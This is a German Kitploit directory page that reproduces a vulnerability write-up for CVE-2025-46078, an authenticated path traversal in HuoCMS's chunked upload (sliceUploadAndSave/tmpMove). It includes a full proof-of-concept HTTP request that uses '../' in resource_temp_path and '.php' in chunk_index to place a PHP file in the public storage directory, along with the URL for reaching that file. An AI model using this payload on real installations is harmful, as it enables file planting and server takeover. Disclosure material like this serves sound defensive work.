Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-46078 — Schwachstellenbeschreibung | Kitploit
Tools/GitHubGitHub/yggcwhat/cve-2025-46078
SchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationPenetrationstestsFehlkonfiguration
GitHubyggcwhat/cve-2025-46078

CVE-2025-46078

Schwachstellenbeschreibung

Repository anzeigen
4vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

BUG_Author:

yggcwhat

Betroffene Version:

Huocms

Anbieter:

https://huocms.com/

Quellcode-Adresse:

https://gitee.com/digital-flag/huocms

Schwachstellendatei:

Upload.php

Betroffene Version:

HuoCMS - <=V3.5.1

Beschreibung:

In der Methode sliceUploadAndSave der Datei AttachmentController.php (unter app -> controller -> backend) wird der Parameter resource_type gegen eine Whitelist erlaubter Dateierweiterungen (z. B. txt, png usw.) validiert. Anschließend ruft die Methode aus (unter ) auf.

Tool herunterladen
tmpMove
Upload.php
app -> service -> upload

Die Methode tmpMove erstellt zunächst eine Datei. Der Parameter $filename (gesteuert durch den benutzerkontrollierten Eingabeparameter resource_temp_path) kann jedoch ausgenutzt werden, um Verzeichnisse zu traversieren (z. B. durch ../), um Ordner zu erstellen. Anschließend führt die Methode eine Verschiebeoperation durch, bei der die Datei in das erstellte Verzeichnis gelegt wird. Der endgültige Dateiname wird durch Anhängen eines Unterstrichs und des Suffixes $pos generiert, wobei $pos über den bei der Übergabe übermittelten Parameter chunk_index gesteuert wird (siehe die tatsächliche Parameterübergabe für Details).

Dies erzeugt eine Sicherheitslücke, bei der ein Angreifer resource_temp_path und chunk_index manipulieren könnte, um Dateien an beliebige Positionen mit kontrollierten Dateinamen zu schreiben.

Details: app >controller >backend > AttachmentController.php:sliceUploadAndSave image

app >service >upload > Upload.php:tmpMove image image

Diese Schwachstelle tritt im Backend auf und erfordert eine Anmeldung im Backend mit einem Token, um sie auszulösen. Bitte richten Sie die Umgebung selbst ein und melden Sie sich an.

POC:

root@kitploit:~
POST /attachment/sliceUploadAndSave HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authorization: token
Content-Type: multipart/form-data; boundary=----geckoformboundary13d3934e0299a09e8748d146bfb9d483
Content-Length: 990
Connection: close
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

------geckoformboundary13d3934e0299a09e8748d146bfb9d483
Content-Disposition: form-data; name="resource_chunk"; filename="blob"
Content-Type: application/octet-stream

1
------geckoformboundary13d3934e0299a09e8748d146bfb9d483
Content-Disposition: form-data; name="chunk_total"

1
------geckoformboundary13d3934e0299a09e8748d146bfb9d483
Content-Disposition: form-data; name="chunk_index"

.php
------geckoformboundary13d3934e0299a09e8748d146bfb9d483
Content-Disposition: form-data; name="resource_temp_basename"

.php
------geckoformboundary13d3934e0299a09e8748d146bfb9d483
Content-Disposition: form-data; name="resource_temp_path"

../../../public/storage/image/20250415/
------geckoformboundary13d3934e0299a09e8748d146bfb9d483
Content-Disposition: form-data; name="resource_type"

txt
------geckoformboundary13d3934e0299a09e8748d146bfb9d483
Content-Disposition: form-data; name="resource_name"

11.png
------geckoformboundary13d3934e0299a09e8748d146bfb9d483--

image

Zugriffs-URL:
http://127.0.0.1/storage/image/20250415/%5f%5f.php image

Referenz:

http://huocms.com https://github.com/yggcwhat/CVE-2025-46078/edit/main/README.md https://www.huocms.com/